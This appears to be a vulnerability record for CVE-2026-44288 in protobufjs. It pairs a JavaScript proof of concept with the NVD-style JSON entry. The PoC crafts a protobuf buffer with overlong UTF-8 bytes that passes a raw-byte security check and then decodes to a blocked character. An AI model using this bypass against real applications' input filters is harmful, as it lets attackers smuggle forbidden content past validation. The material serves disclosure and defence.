CVE-2026-44288

// Conceptual PoC for protobufjs UTF-8 Overlong Decoding // Vulnerable versions: < 7.5.6, < 8.0.2 const protobuf = require("protobufjs"); // Define a simple message type with a string field const root = protobuf.Root.fromDefinition({ nested: { Message: { fields: { content: { type: "string", id: 1 } } } } }); const Message = root.lookupType("Message"); // Normal byte for 'A' is 0x41. // Overlong encoding for 'A' is 0xC0 0x81 (2-byte representation of a 1-byte character). // Bypass logic: Check raw bytes for 0x41 (Block it), but allow 0xC0 0x81. function checkRawBytes(buffer) { // Simulate a security check blocking 'A' for (let i = 0; i < buffer.length; i++) { if (buffer[i] === 0x41) { throw new Error("Security check failed: 'A' found in raw bytes."); } } console.log("Security check passed."); } // Construct malicious payload using overlong encoding // Wire format: Tag (Field 1, Wire Type 2) + Length + Value // Tag: 0x0A (Field 1 << 3 | 2) // Length: 0x02 // Value: 0xC0 0x81 (Overlong 'A') const maliciousBuffer = Buffer.from([0x0A, 0x02, 0xC0, 0x81]); try { checkRawBytes(maliciousBuffer); // Decode using protobufjs (vulnerable version) const decoded = Message.decode(maliciousBuffer); console.log("Decoded string:", decoded.content); // If vulnerable, this prints "A" despite the check. if (decoded.content === 'A') { console.log("Vulnerability exploited: Overlong encoding bypassed filter."); } } catch (e) { console.error(e.message); }

{"cve": {"id": "CVE-2026-44288", "sourceIdentifier": "[email protected]", "published": "2026-05-13T16:16:55.587", "lastModified": "2026-05-13T17:01:38.423", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "protobufjs compiles protobuf definitions into JavaScript (JS) functions. Prior to 7.5.6 and 8.0.2, protobufjs includes a minimal UTF-8 decoder that accepted overlong UTF-8 byte sequences and decoded them to their canonical characters instead of replacing them. An attacker who can provide protobuf binary data decoded through the affected UTF-8 path may be able to bypass application-level checks that inspect raw bytes before protobuf string decoding. For example, bytes that do not contain certain ASCII characters could decode to strings containing those characters. This vulnerability is fixed in 7.5.6 and 8.0.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-176"}]}], "references": [{"url": "https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-q6x5-8v7m-xcrf", "source": "[email protected]"}]}}